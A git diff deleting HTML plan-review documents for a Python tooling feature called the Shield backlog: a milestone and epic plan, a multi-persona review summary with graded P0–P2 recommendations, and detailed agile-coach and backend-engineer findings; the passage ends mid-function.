diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
deleted file mode 100644
index b3fdd559..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
+++ /dev/null
@@ -1,274 +0,0 @@
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Plan — Shield Backlog

-

Project: Shield · Phase: v1 · Domain: backend (Python)
PRD: ./prd.md (reviewed Ready, composite 3.1) · TRD: ./trd.md · Sidecar: ./plan.json

- -

A project-level Shield backlog: capture (user/agent) → user-driven promotion → reconciliation. Entries are removed when their work commits — eagerly at the end of a promoted /plan or /implement run, lazily on the /backlog view sweep, or manually. Matching is by feature (manifest.json index) + epic (plan.json gate); no ids are stamped.
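The reconciliation rule summarized above can be sketched as follows. This is only an illustration under stated assumptions: the data shapes (`features[].name`, `features[].artifacts`, `epics[].name`), the exact-string match, and the `reconcile` name are hypothetical, and the review itself notes that the real match algorithm is not yet pinned down. What the sketch does show is the never-remove-on-doubt default: an entry is removed only when everything lines up, and stays in every other case.

```python
def reconcile(entries, manifest, plans):
    """Return (kept, removed) under a never-remove-on-doubt rule.

    Assumed shapes (not confirmed by the source):
      manifest = {"features": [{"name": str, "artifacts": [str, ...]}]}
      plans    = {feature_name: {"epics": [{"name": str, ...}]}}
    """
    kept, removed = [], []
    for entry in entries:
        features = [f for f in manifest.get("features", [])
                    if f.get("name") == entry.get("feature")]
        # Doubt: feature missing, duplicated, or has no plan artifact yet.
        if len(features) != 1 or "plan" not in features[0].get("artifacts", []):
            kept.append(entry)
            continue
        plan = plans.get(entry.get("feature"))
        # Malformed or missing plan degrades to "entry stays", not an exception.
        epics = plan.get("epics", []) if isinstance(plan, dict) else []
        matches = [e for e in epics
                   if isinstance(e, dict) and e.get("name") == entry.get("epic")]
        # Remove only on exactly one epic match; zero or several means doubt.
        if len(matches) == 1:
            removed.append(entry)
        else:
            kept.append(entry)
    return kept, removed
```

Because the function only ever moves an entry from the backlog to `removed` on a positive match, running it again on the `kept` list removes nothing further, which is the idempotence the eager and lazy triggers rely on.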

-
-

Review note (P0 — gate 0d): Before this plan ships, paraphrase TRD §2 so it no longer restates PRD §3 verbatim (current 92-char overlap exceeds the 80-char duplication threshold). Summarize the problem in technical-framing terms and link to PRD §3 instead of repeating it.

- -
-

Milestones

| ID | Name | Depends on | Outcome |
|---|---|---|---|
| M1 | Capture + store + view | | backlog.json + schema/validator; capture (user + skill, atomic); /backlog ordered view with manifest status badges; manual remove. |
| M2 | Feature + epic association + suggestion | M1 | Every entry carries feature + epic (existing or proposed-new); agent suggests from manifest/plan; user accept/replace/create-new. |
| M3 | Promotion + reconciliation | M2 | Promotion via transient reference; reconciliation engine (match key, never-remove-on-doubt, drift tolerance); eager + lazy idempotent triggers; eval suite + version bump. |
-
-

EPIC-1 — Store, schema & capture (M1)

-

EPIC-1-S1 · Define backlog.json schema and validator (high)

-

Define backlog.json shape + JSON Schema with a top-level schema_version, plus a Python validator. Entry: {id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}. schema_version is set now so future shape changes migrate read-old/write-new.

-
  • Tasks: author shield/schema/backlog.schema.json; document entry shape + migration policy in shield/skills/general/backlog/SKILL.md; create shield/scripts/validate_backlog.py; ordering = single integer order.
    • **Specify the `id` contract:** type (string), generation strategy (uuid4 / monotonic / slug — pick one and document it), and a schema-level **uniqueness** constraint across `entries[]`. Remove/promote/prune all key off `id`.
  • AC: schema rejects unknown kind (named error); validate_backlog.py exits 0/non-zero correctly; schema_version + migration policy present; enums constrained.
    • **+ AC:** schema rejects an `entries[]` array containing duplicate `id` values, naming the error.
    • Either add a no-op `migrate(doc) -> doc` seam with a unit test, **or** reword the migration AC to "migration *policy* documented (doc-only until schema_version 2)" so it isn't mistaken for working code.
  • Design: §11 APIs Involved · LLD backlog-store (TODO)
-

EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write (high)

-

Capture usable by the user (/backlog add) and any skill (documented write helper). Atomic temp-then-rename + validate-or-refuse so concurrent capture vs reconciliation can't corrupt the file. Resolves PRD-review P1 (capture interface).

-
  • Tasks: /backlog add (assigns next order); skill-callable write helper (text, kind, feature?, epic?, source); atomic write; validate-or-refuse.
    • **Lock the write-helper signature here (do not defer to LLD):** pin name, module path, parameters, return type, and raise-on-invalid behavior — e.g. `capture(text, *, kind="task", feature=None, epic=None, source) -> entry_id` in `shield/scripts/backlog_store.py`. This is the carried-forward PRD-review P1 and the contract every capturing skill builds against; it cannot stay open as TRD §12 Q3.
    • **Name the concurrency strategy.** Temp-then-rename prevents a *torn* file but not lost updates (two read-modify-writes → last-writer-wins drops an entry). Either document the single-writer assumption explicitly *next to* the N1 threat statement (N5 already says "single actor"), or implement a lockfile / re-read-and-merge / `O_EXCL` temp. Name the atomic primitive used (`os.replace`).
  • AC: user + skill capture both work; interface documented; mid-write kill leaves no corruption; next order/default kind assigned.
    • **+ AC:** a malformed/partial `backlog.json` on read is **refused with a named error** (validate-or-refuse refusal path), never silently read or truncated.
  • Design: §5 Functional Requirements · LLD backlog-store (TODO)
-

EPIC-1-S3 · /backlog view — ordered list (high)

-

/backlog command + skill rendering entries sorted by order with feature + epic + source.

-
  • Tasks: author shield/commands/backlog.md + backlog/SKILL.md; render sorted; empty-backlog message.
  • AC: ascending-order list with feature/epic/source; clean empty message; command registered.
  • Design: §4 Product Journey
- -

EPIC-1-S4 · Manual remove from /backlog (medium)

-

/backlog remove <id> — plain delete for ideas decided against / entries no run will clear.

-
  • Tasks: remove <id> via atomic helper; confirm-before-delete; clear error on absent id.
  • AC: deletes + persists atomically; absent id = clear no-op error; no history retained.
    • Note (doc): `git revert` recoverability (N4) covers only entries that reached a commit; a manual remove of an *uncommitted* entry is unrecoverable by design.
  • Design: §5 Functional Requirements
-
-

EPIC-2 — Association & pipeline status

-

EPIC-2-S1 · Per-entry pipeline status from manifest.json (high, M1)

-

/backlog view shows each entry's feature pipeline status (research/prd/plan) read live from manifest.json — so "prd done, not yet planned" is visible without removal.

-
  • Tasks: read manifest; render status badges per entry; not started when feature absent; compute at view time (no stored status).
  • AC: badges derived from manifest; prd-but-no-plan shows prd ✓ plan – and stays; absent feature → not started.
  • Design: §7 High-Level Design
-

EPIC-2-S2 · Feature + epic association + agent suggestion (high, M2)

-

Associate every entry with a feature (reconciliation key) + epic (removal gate), either proposed-new; agent suggests feature (manifest) + epic (plan.json); user accept/replace/create-new.

-
  • Tasks: prompt/accept feature + epic (allow proposed-new); suggest by scanning manifest + candidate plan.json; never block capture.
    • **Define the suggestion + match heuristic concretely** (no "best match" hand-wave): the matching method (e.g. case-insensitive, whitespace-normalized substring + token-overlap ranking on feature/epic names), the tie-break/ambiguity rule (→ entry stays, never auto-pick on a tie), and epic-rename behavior. Resolve PRD §9's open "discovery cost" question or land `/lld epic-suggester`.
  • AC: every entry has feature + epic; ≥1 feature + ≥1 epic candidate proposed when matches exist; capture succeeds with proposed-new when none.
    • **+ measurable AC:** given a fixture manifest with feature `auth`, capturing text mentioning "auth" surfaces `auth` as the top candidate; a 2-way name tie surfaces both and auto-picks neither.
  • Design: §5 Functional Requirements · LLD epic-suggester (TODO)
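The match heuristic requested above can be sketched as follows. This is a minimal illustration under stated assumptions, not the plan's chosen method: the function names `normalize` and `suggest` are hypothetical, and ranking by whole-token overlap is only one of the options the note lists.

```python
import re


def normalize(name: str) -> str:
    """Collapse whitespace and fold case so names compare consistently."""
    return re.sub(r"\s+", " ", name).strip().casefold()


def _tokens(text: str) -> set:
    # Hypothetical tokenizer: lowercase alphanumeric runs only.
    return set(re.findall(r"[a-z0-9]+", normalize(text)))


def suggest(text: str, candidates: list) -> tuple:
    """Return (top_candidates, auto_pick).

    Candidates are scored by how many tokens they share with the captured
    text. On a tie, every tied candidate is surfaced and auto_pick is None,
    so nothing is chosen on the user's behalf.
    """
    words = _tokens(text)
    scored = [(len(words & _tokens(c)), c) for c in candidates]
    scored = [(score, c) for score, c in scored if score > 0]
    if not scored:
        return [], None  # caller falls back to "proposed-new"
    best = max(score for score, _ in scored)
    top = [c for score, c in scored if score == best]
    return top, (top[0] if len(top) == 1 else None)
```

With a fixture manifest containing `auth` and `billing`, text mentioning only "auth" yields `auth` as the single top candidate, while text mentioning both surfaces both and picks neither, which matches the measurable AC.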
-
-

EPIC-3 — Promotion & reconciliation (M3)

-

EPIC-3-S1 · User-driven promotion with transient reference (high)

-

/backlog promote <id> launches the user-chosen step (/research, /prd, /plan, or /implement) and passes the entry id as a transient runtime reference — never stamped into plan.json.

-
  • Tasks: promote <id> affordance; forward id as transient reference; document non-persistence; shippable work routes through /plan, direct /implement for rare planless one-offs.
  • AC: promotion starts the chosen step + forwards the reference; reference not persisted to plan.json/stories; tool never auto-routes.
  • Design: §4 Product Journey
- -

EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) (high)

-

Locate feature in manifest.json; if it has a plan.json, check the entry's epic. Match: existing epic → by id; proposed-new → by epic name. Ambiguity/no-match → entry stays. Unknown manifest/plan shapes → doubt (stays), never crash.

-
  • Tasks: shield/scripts/reconcile_backlog.py; match key impl; never-remove-on-doubt; drift tolerance with logged warning.
    • **State the "epic landed" gate as one precise predicate** and use it everywhere: "an entry is removed when an epic with the matching id (existing) or normalized name (proposed-new) is **present in `plan.json.epics[]`**; story `status` is **not** consulted." F7, the EPIC-3-S2 AC, and the schema currently word this three ways.
    • **Log every removal with rationale** to a defined destination/format: `{entry id, feature, epic, match-kind (id|name), triggering run, gating plan.json path}`. Today only the never-remove-on-doubt path logs (N3); a confident-but-wrong removal must not be a silent git diff.
  • AC: plan-committed epic selected for removal, prd-only not; id/name match per case; malformed/old shapes → entry stays (logged), no exception.
    • **+ fixture/AC:** epic-name collision across two different features → ambiguous → entry stays (the one place a wrong removal is plausible; PRD §10 risk / §14 trigger).
  • Design: §7 High-Level Design · LLD reconciler (TODO)
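The "epic landed" predicate stated above could be written as a single function along these lines. This is a hedged sketch: the source does not define how an entry records its epic, so the `{"id": ...}` versus `{"name": ...}` reference shape and the `id`/`name` keys on each `plan.json` epic are assumptions made for illustration, as is the name `epic_landed`.

```python
def _norm(name: str) -> str:
    """Case-fold and collapse whitespace before comparing epic names."""
    return " ".join(name.split()).casefold()


def epic_landed(entry_epic, plan) -> bool:
    """True only when exactly one epic in plan["epics"] matches the entry.

    entry_epic is assumed to be {"id": ...} for an existing epic or
    {"name": ...} for a proposed-new one. Story status is never consulted.
    Any unknown shape, missing key, or ambiguous match counts as doubt,
    so the function returns False and the entry stays.
    """
    try:
        epics = plan["epics"]
        if "id" in entry_epic:
            hits = [e for e in epics if e["id"] == entry_epic["id"]]
        else:
            wanted = _norm(entry_epic["name"])
            hits = [e for e in epics if _norm(e["name"]) == wanted]
    except (KeyError, TypeError, AttributeError):
        return False  # never-remove-on-doubt: malformed input is not a crash
    return len(hits) == 1
```

Requiring exactly one hit keeps an ambiguous name inside a single plan from being treated as a confident match; collisions across features would still need handling by the caller that selects which plan to pass in.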
-

EPIC-3-S3 · Eager + lazy removal triggers (idempotent) (high)

-

Eager prune at end of a promoted /plan or /implement run (via the transient reference); lazy sweep on /backlog view. Both idempotent; both call the one reconciliation engine.

-
  • Tasks: eager prune hook at end of /plan + /implement; lazy sweep on view; idempotent remove-if-present; shared engine.
    • **Ship the kill switch.** Add a `.shield.json` flag (e.g. `backlog.auto_reconcile: false`) that disables eager prune and lazy sweep **independently**, leaving manual-remove only. §14 names this as the rollback fallback but no story currently delivers it — without it the documented mitigation is unactionable.
    • **Close the uncommitted-state recovery gap.** Eager prune fires at end-of-run, possibly before `backlog.json` is committed, so `git revert` (N4) can't recover. Either commit `backlog.json` before the destructive prune, or append pruned entries to a transient `.shield/backlog-removed.log`.
    • **Instrument the N2 ~1s budget.** Add a debug-gated latency line to `/backlog` view so "revisit if breached" (Q1 epic-index) is falsifiable, not "a human notices slowness."
  • AC: promotion removes referenced entry at end of run (eager); sweep removes plan-committed entries (lazy); second pass is a no-op (idempotent); shared engine.
  • Design: §7 High-Level Design · LLD reconciler (TODO)
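The idempotent remove-if-present step shared by the eager and lazy triggers might look like the sketch below. The function name `prune` and the `{"schema_version", "entries"}` document shape are assumptions based on the entry shape described in EPIC-1-S1; persistence and logging are deliberately left out.

```python
def prune(doc: dict, entry_id: str) -> tuple:
    """Return (new_doc, removed) without mutating the input document.

    Removing an id that is not present is a no-op, so running the eager
    prune and then the lazy sweep for the same entry is safe.
    """
    kept = [entry for entry in doc["entries"] if entry["id"] != entry_id]
    removed = len(kept) != len(doc["entries"])
    return {**doc, "entries": kept}, removed
```

Returning the `removed` flag lets the caller log a removal only when one actually happened, which lines up with the request to log every removal with its rationale.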
-
-

EPIC-4 — Eval coverage & release (M3)

-

EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) (high)

-

Per CLAUDE.md eval mandate: cover capture (user + skill), view + status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt.

-
  • Tasks: fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays); evals for each behavior; wire into CI; capture RED + GREEN in PR.
    • **+ concurrency eval:** two interleaved captures (and a capture racing a reconciliation write) against the same `backlog.json` assert no corruption **and no lost entry** — the actual N1 threat, distinct from the crash-mid-write test.
    • **+ no-stamping eval (F6):** after promotion via `/plan`/`/implement`, assert `plan.json` and story records are **byte-unchanged**. F6 is the load-bearing trust boundary and is currently absent from the eval coverage list.
    • **+ recovery-rehearsal eval:** after a simulated wrong removal, assert `git revert` / file-restore brings the entry back (exercises the N4 recovery path the plan relies on).
    • Name the CI entrypoint explicitly (which runner under `shield/evals/`) and the path-filter glob scoping "backlog assets" (e.g. `shield/{schema,scripts,skills/general/backlog}/**`, `shield/commands/backlog.md`).
  • AC: eval suite under shield/evals/ covers all behaviors; self-contained (no API/LLM); PR body has RED + GREEN; CI runs on backlog-asset PRs.
  • Design: §10 Milestones
-

EPIC-4-S2 · Version bump + command/skill docs (medium)

-

Bump the Shield plugin version (marketplace.json + pyproject where touched) in the same commit as asset changes; finalize /backlog + backlog SKILL.md docs.

-
  • Tasks: bump marketplace.json; bump touched pyproject.toml; finalize command/skill docs (capture, triggers, match key, manual remove, badges); CHANGELOG.
    • Add explicit DoD lines: "PR reviewed and merged" and "marketplace version published" so 'done' is unambiguous.
    • Document the manual `/backlog` audit cadence (e.g. monthly) and which §7 reading triggers action — the single owner needs a concrete on-call procedure, not "periodic."
  • AC: version bumped in same commit; command + SKILL document capture/view/promote/remove + 3 triggers; CHANGELOG mentions the feature.
  • Design: §13 References
-
-

Pre-build action: validate the bet (P1 — PM10)

- -

Before committing all four milestones, capture a rough baseline of lost / re-derived future-work items over a recent week of Shield usage (from git history or chat logs) to ground the operational-savings claim. The PRD itself (§10) flags this as the load-bearing unvalidated assumption; a cheap baseline now de-risks the whole investment and seeds the §7 success metric.

-
-

Carried forward from PRD-review (Ready, run _2)

-
  • Capture-from-skill interface defined → EPIC-1-S2 / TRD §11. (Review note: still open as TRD §12 Q3 — P1 #1 closes it.)
  • backlog.json schema_version + migration → EPIC-1-S1 / TRD §9.
  • Reconciliation read-contract drift tolerance → EPIC-3-S2 / TRD §6 N3.
  • Eager-prune + lazy-sweep idempotency → EPIC-3-S3 / TRD §5 F8.
-

Next steps

-
  • /pm-sync — sync epics + stories to ClickUp.
  • /implement — begin TDD implementation (start at M1 / EPIC-1-S1 once the P0 doc-fix and the EPIC-1 P1s are folded in).
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
deleted file mode 100644
index f3c13635..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
+++ /dev/null
@@ -1,235 +0,0 @@
Review — backlog-20260527

Plan Review — Shield Backlog

-

Date: 2026-05-27
Plan: docs/shield/backlog-20260527/ (plan.md + trd.md + plan.json)
Source PRD: prd.md (type: lean) · prior PRD-review: reviews/prd/2026-05-27_2 (Ready, 3.12)
Reviewers: DX Engineer, Agile Coach, Backend Engineer, Security Engineer, SRE, Product Manager (PM1–PM10)
Composite Score: B (3.14) — Ready · 1 P0 (deterministic gate) · 12 P1 · 13 P2

-
-

Verdict: Ready, pending one P0 doc-fix. The plan is well-structured, MVP-disciplined, and error-handling-first; the milestone DAG is acyclic and fully covered; the reconciliation read-contract was verified accurate against the live manifest.json/plan-sidecar.schema.json. The single P0 is a cheap one-line paraphrase (TRD §2 restates PRD §3 verbatim). The 12 P1s cluster around four real gaps the implementers should close first: the skill write-helper signature is still open, atomicity is conflated with isolation (lost-update path), the match heuristic is undefined, and several load-bearing guarantees lack tests / shipped toggles (F6 no-stamping, validate-or-refuse, the §14 kill switch, removal audit logging).

-
-

Score Summary

| Persona | Weight | Grade | Key Finding |
|---------|--------|-------|-------------|
| DX Engineer | 1.0 | B (3.4) | Clear & sound, but 3 design_refs point at non-existent LLDs and the capture-helper signature is deferred |
| Agile Coach | 0.7 | B (3.36) | Sprint-ready with an acyclic, fully-covered DAG; only EPIC-2-S2's match heuristic is not estimable |
| Backend Engineer | 1.0 | B (3.33) | Read-contract verified accurate; held back by open helper signature + atomicity≠isolation |
| Security Engineer | 1.0 | B (3.05) | Sound for local single-actor tooling; N1 race + F6 no-stamping asserted but untested |
| SRE | 0.7 | B (3.0) | Failure-mode analysis & staged rollout are A-grade; day-2 instrumentation is thin |
| Product Manager | 0.7 | A (3.7) | Strong on impact/scope/prioritization/reversibility; PM10 business-value baseline unvalidated (C) |

Composite = (3·1.0 + 3·0.7 + 3·1.0 + 3·1.0 + 3·0.7 + 4·0.7) / 5.1 = 3.14 → B — Ready
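The composite line above reads as a weighted mean of letter-grade points, which can be checked with a short sketch. The point mapping is an assumption inferred from the formula (A counts as 4, B as 3; the lower grades are filled in by analogy), and `composite` is a hypothetical helper, not a Shield function.

```python
# Assumed mapping: only A=4 and B=3 are implied by the formula in the review.
GRADE_POINTS = {"A": 4, "B": 3, "C": 2, "D": 1, "F": 0}


def composite(scores: list) -> float:
    """Weighted mean of grade points; scores is a list of (grade, weight)."""
    total_weight = sum(weight for _, weight in scores)
    weighted = sum(GRADE_POINTS[grade] * weight for grade, weight in scores)
    return round(weighted / total_weight, 2)


# Persona grades and weights in Score Summary order.
REVIEW = [("B", 1.0), ("B", 0.7), ("B", 1.0), ("B", 1.0), ("B", 0.7), ("A", 0.7)]
print(composite(REVIEW))
```

The numerator is 16.0 and the weights sum to 5.1, which reproduces the 3.14 reported in the review. Note that the per-persona decimals in the table (3.4, 3.36, and so on) do not enter this formula; only the letter grades do.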

-

Deterministic TRD Gates (run before persona dispatch)

| Gate | Rule | Result |
|------|------|--------|
| 0a | Schema validation (validate_plan.py) | ✅ PASS (exit 0) |
| 0b | TRD 14-section presence (validate_trd.py) | ✅ PASS (exit 0) |
| 0c | Stale-anchor on design_refs[] | ✅ PASS — all trd.md#… anchors live; lld refs have null anchors (intentional TODO) |
| 0d | PRD↔TRD duplication (>80-char overlap) | FAIL → P0 — TRD §2 restates PRD §3 with a 92-char verbatim overlap |
| 0e | Implementation-manual (§7 fence >20 lines) | ✅ PASS — §7 is a 13-line ASCII diagram, not code |

Consolidated Recommendations

-

P0 — Must Fix (blocks sprint planning)

-
  1. [Gate 0d] Paraphrase TRD §2 so it no longer restates PRD §3 verbatim. The opening sentence shares a 92-char run (" — during /research, while writing a PRD, mid-/plan, and especially during /implement ") with PRD §3, exceeding the 80-char duplication threshold. Rewrite TRD §2 to summarize the problem in technical-framing terms and link to PRD §3 rather than repeating it. (One-line fix; mechanical.)
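A duplication gate of the kind described for 0d can be approximated by measuring the longest verbatim run two documents share. The sketch below is an assumption about how such a check might work, not the actual Shield gate: `longest_shared_run` and `gate_0d` are hypothetical names, and comparing raw characters (rather than normalized text) is a simplification.

```python
from difflib import SequenceMatcher


def longest_shared_run(a: str, b: str) -> str:
    """Return the longest substring that appears verbatim in both texts."""
    matcher = SequenceMatcher(None, a, b, autojunk=False)
    match = matcher.find_longest_match(0, len(a), 0, len(b))
    return a[match.a:match.a + match.size]


def gate_0d(prd_text: str, trd_text: str, threshold: int = 80) -> tuple:
    """Return (passed, run); the gate fails when the run exceeds threshold."""
    run = longest_shared_run(prd_text, trd_text)
    return len(run) <= threshold, run
```

Returning the offending run alongside the pass/fail flag lets the report quote the exact overlap, as the P0 finding does.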

P1 — Should Fix (plan quality)

-
  1. [Backend, DX] Lock the skill write-helper signature in EPIC-1-S1/S2 ACs. This is the carried-forward PRD-review P1, but TRD §12 Q3 still punts the signature to "/lld or implementation." Pin name, module path, params, return, and raise-on-invalid behavior now (e.g. capture(text, *, kind="task", feature=None, epic=None, source) -> entry_id in shield/scripts/backlog_store.py) — downstream skills cannot be built/tested against an undefined shape.
  2. [Backend, Security] Name the concurrency strategy — atomicity ≠ isolation. N1 defends "capture racing reconciliation," but temp-then-rename alone does not prevent lost updates (two read-modify-writes → last-writer-wins drops an entry). Either document the single-writer assumption where N1 describes the threat (N5 already says "single actor") or add a lock / re-read-and-merge / O_EXCL. Add an interleaved-capture eval.
  3. [DX, Agile, Backend] Define the feature/epic match + suggestion heuristic. Replace "best match" / "names expected stable" (EPIC-2-S2, EPIC-3-S2) with a concrete rule: normalization (case/whitespace), tie-break/ambiguity → entry stays, and epic-rename behavior. Add a measurable AC and resolve PRD §9's open "discovery cost" question (or land /lld epic-suggester).
  4. [Security] Add an eval asserting promotion leaves plan.json byte-unchanged (F6 no-stamping). F6 is the load-bearing trust boundary; it has an AC but is absent from EPIC-4-S1's listed eval coverage.
  5. [Security] Add an AC that a malformed/partial backlog.json on read is refused with a named error. "Validate-or-refuse on read" (F2/N1) currently has no AC proving the refusal path (only crash-atomicity is tested).
  6. [SRE] Ship the "disable eager prune" kill switch as a story/task. §14 names it as the rollback action but no story delivers the toggle — add a .shield.json flag (e.g. backlog.auto_reconcile) disabling eager prune and lazy sweep independently. Today the documented mitigation is unactionable.
  7. [SRE] Log successful removals with rationale. Only the never-remove-on-doubt path logs (N3). Eager prune / lazy sweep should log {entry id, feature, epic, match-kind, triggering run, gating plan.json} to a defined destination — otherwise a confident-but-wrong removal leaves a git diff with no reasoning.
  8. [SRE] Close the uncommitted-state recovery gap. Eager prune fires at the end of /plan or /implement, possibly before backlog.json is committed — at which point git revert (N4) cannot recover the entry. Commit before the destructive prune, or write pruned entries to a transient .shield/backlog-removed.log.
  9. [SRE] Instrument the N2 ~1s budget. "Revisit if breached" (Q1 epic-index) is unfalsifiable without timing — add a debug-gated latency line to /backlog view so the breach signal isn't "a human notices slowness."
  10. [PM10] Ground the business-value claim with a rough baseline. The whole justification rests on an explicitly unvalidated assumption that lost future-work volume is high enough to justify the tool. Count lost/re-derived items over a recent week (git history / chat) before committing all four milestones.
  11. [Backend] Specify the id contract. id is required but its type, generation strategy, and uniqueness are undefined, yet remove/promote/prune all key off it. Add type + generation (uuid4/monotonic/slug) + a uniqueness constraint in EPIC-1-S1, plus an AC: "schema rejects duplicate id."
  12. [Backend] State the "epic landed" gate as one precise predicate. F7 ("epic's work appears"), EPIC-3-S2 AC ("epic's stories appear"), and the schema (stories[] minItems:1) say it three ways. Pin it: "epic with matching id/name is present in plan.json.epics[]; story status is not consulted."

P2 — Nice to Have

-
  1. [DX] Name the CI entrypoint + path-filter glob in EPIC-4-S1 ("wire into CI" is not actionable as written).
  2. [DX] Add an explicit intra-epic story-dependency note for EPIC-3 (S1+S2 must land before S3).
  3. [DX] Specify the badge render format once (EPIC-2-S1 shows it only as an example) and add a local-dev/dry-run loop to the backlog SKILL.md.
  4. [Agile] Add code-review + "marketplace version published" steps to the implied Definition of Done (EPIC-4-S2).
  5. [Agile] Land or stub /lld backlog-store, /lld epic-suggester, /lld reconciler so the unresolved TODO design_refs resolve before sprint start.
  6. [Backend] Add a no-op migrate(doc)->doc seam + test, or explicitly scope the schema_version AC as doc-only-until-v2 (it currently overstates "migration policy present" as working code).
  7. [Security] Add a --dry-run reconciliation canary so a maintainer validates against their real backlog before trusting auto-removal.
  8. [Security] Add a fixture for epic-name collision across two different features (PRD §10 risk / §14 trigger) asserting the entry stays.
  9. [Security] Define the security purpose of the source ∈ {user, agent} field (provenance/audit-only vs. trust signal) and address agent-injected entries flowing into /plan.
  10. [Security] Note in N4/EPIC-1-S4 that git-revert recoverability only covers committed entries — a manual remove of an uncommitted entry is unrecoverable by design.
  11. [SRE] Give the manual /backlog audit a concrete cadence and "what reading triggers action."
  12. [SRE] Add a recovery-rehearsal eval (assert git revert / restore brings a wrongly-pruned entry back).
  13. [PM5] Add a 2–3 sentence plain-language executive summary atop trd.md and plan.md before the schema-/pipeline-heavy detail.

Detailed Agent Findings

| Agent | Grade | Detailed Report |
|-------|-------|-----------------|
| DX Engineer | B | detailed/dx-engineer.md |
| Agile Coach | B | detailed/agile-coach.md |
| Backend Engineer | B | detailed/backend-engineer.md |
| Security Engineer | B | detailed/security-engineer.md |
| SRE | B | detailed/sre.md |
| Product Manager (PM1–PM10) | A | detailed/product-manager.md |
- -
-
Generated by Shield
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
deleted file mode 100644
index f7582d3e..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
+++ /dev/null
@@ -1,133 +0,0 @@
Shield Plan Review — Backlog

Agile Coach — Detailed Findings

-
-

Back to summary

-
-

Persona grade: A−. A mature re-plan: prior findings folded and traceable, decisions LOCKED, milestone DAG verifiably acyclic with full story coverage and no dangling references, ACs overwhelmingly independently testable. Short of A because EPIC-3-S3 carries an either/or recovery AC that can't be written as a single test, and the same story bundles four concerns.

-

Evaluation points (A–F)

| # | Point | Grade |
|---|-------|-------|
| AC1 | Story sizing | A− |
| AC2 | Story independence | B+ |
| AC3 | Dependency ordering | A |
| AC4 | Context completeness | A |
| AC5 | Requirements clarity | A |
| AC6 | Implementation step quality | A− |
| AC7 | Acceptance criteria testability | A− |
| AC8 | Sprint-readiness | A− |
| AC9 | Estimation feasibility | A |
| AC10 | Definition of Done alignment | A− |
| AC13 | Milestone coverage | A (M1=5, M2=1, M3=5) |
| AC14 | Milestone reference integrity | A (no dangling milestone_id) |
| AC15 | Milestone exit-criteria testability | A− |
| AC16 | Milestone DAG integrity | A (acyclic M1→M2→M3) |

Findings

| Priority | Point | Recommendation |
|----------|-------|----------------|
| P1 | AC7 | EPIC-3-S3 AC5 encodes an unresolved OR ("backlog.json committed before the prune or appended to .shield/backlog-removed.log") — not writable as one pass/fail test. Pick one mechanism (LLD leans to the removed-log) and rewrite as a single asserted behavior. |
| P2 | AC1/AC15 | EPIC-3-S3 bundles four concerns (eager, lazy, kill switch, recovery); M3's 6th exit criterion folds 10 eval behaviors into one line. Consider splitting S3 into S3a (triggers) + S3b (kill switch + recovery + latency). Not blocking. |
| P2 | AC8/AC9 | M2 carries a single story while EPIC-2-S1 sits in M1 — EPIC-2 deliberately straddles M1/M2. Note this in the plan so it doesn't read as a numbering slip. |
| P2 | AC6 | N2 ~1s target is verified only by a debug line, not an assertion. State the WARN threshold the human checks against (e.g. "log WARN if view+sweep > 1s"). |

No P0 findings. Dependency ordering and milestone integrity (coverage, references, DAG, exit-criteria testability) all pass programmatic verification.

diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
deleted file mode 100644
index a1ce3ec0..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
+++ /dev/null
@@ -1,99 +0,0 @@
Shield Plan Review — Backlog

Backend Engineer — Detailed Findings

-
-

Back to summary

-
-

Persona grade: B−. A well-structured, honestly-bounded plan with excellent error/idempotency/testability discipline, held back from B+/A− by three contract defects that only surface when the design is placed next to the real manifest.json / plan.json / shield.schema.json.

-

Evaluation points (A–F)

| # | Point | Grade |
|---|-------|-------|
| 1 | F8 "epic landed" predicate consistency | B |
| 2 | Single-writer concurrency claim (N1) | B+ |
| 3 | Atomic-write + validate-or-refuse correctness | A− |
| 4 | The id contract | A− |
| 5 | LLD API contracts implementable as specified | C+ |
| 6 | Python packaging via uv | B |
| 7 | Error semantics | A− |
| 8 | Idempotency | A |
| 9 | Testability | A− |

P0 findings (verified against live schemas)

-

P0-1 — reconcile/suggest_* contracts don't match the real manifest.json/plan.json shapes

-

Every cross-document reference treats manifest and plans as opaque dicts, but the live artifacts have a specific shape the contracts contradict. manifest.json is {"schema_version":…, "features":[ {name, artifacts:{research,prd,plan_json,plan_md,plan_arch_md}, reviews, updated} ]} — a list keyed by name, with a boolean plan_json flag and no plan path stored. reconcile(entry, *, manifest: dict, plans: dict) (lld-reconciler.md §5) never defines plans and never says the reconciler must derive docs/shield/<feature>/plan.json.
Fix: pin the real shapes in lld-reconciler.md §5 and lld-epic-suggester.md §5; define plans: dict[str, dict] (feature-slug → parsed plan.json) populated by reading docs/shield/<feature>/plan.json for each feature whose artifacts.plan_json is True; state the flag is plan_json (boolean) and the path is derived. Add an EPIC-4-S1 fixture from the actual manifest schema.
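The derivation of `plans` proposed in the fix could be sketched as below. This is an illustration under assumptions: `load_plans` is a hypothetical helper, `root` stands for the `docs/shield` directory, and the feature `name` is assumed to equal its folder slug (the invariant P1-3 asks to be pinned).

```python
import json
from pathlib import Path


def load_plans(manifest: dict, root: Path) -> dict:
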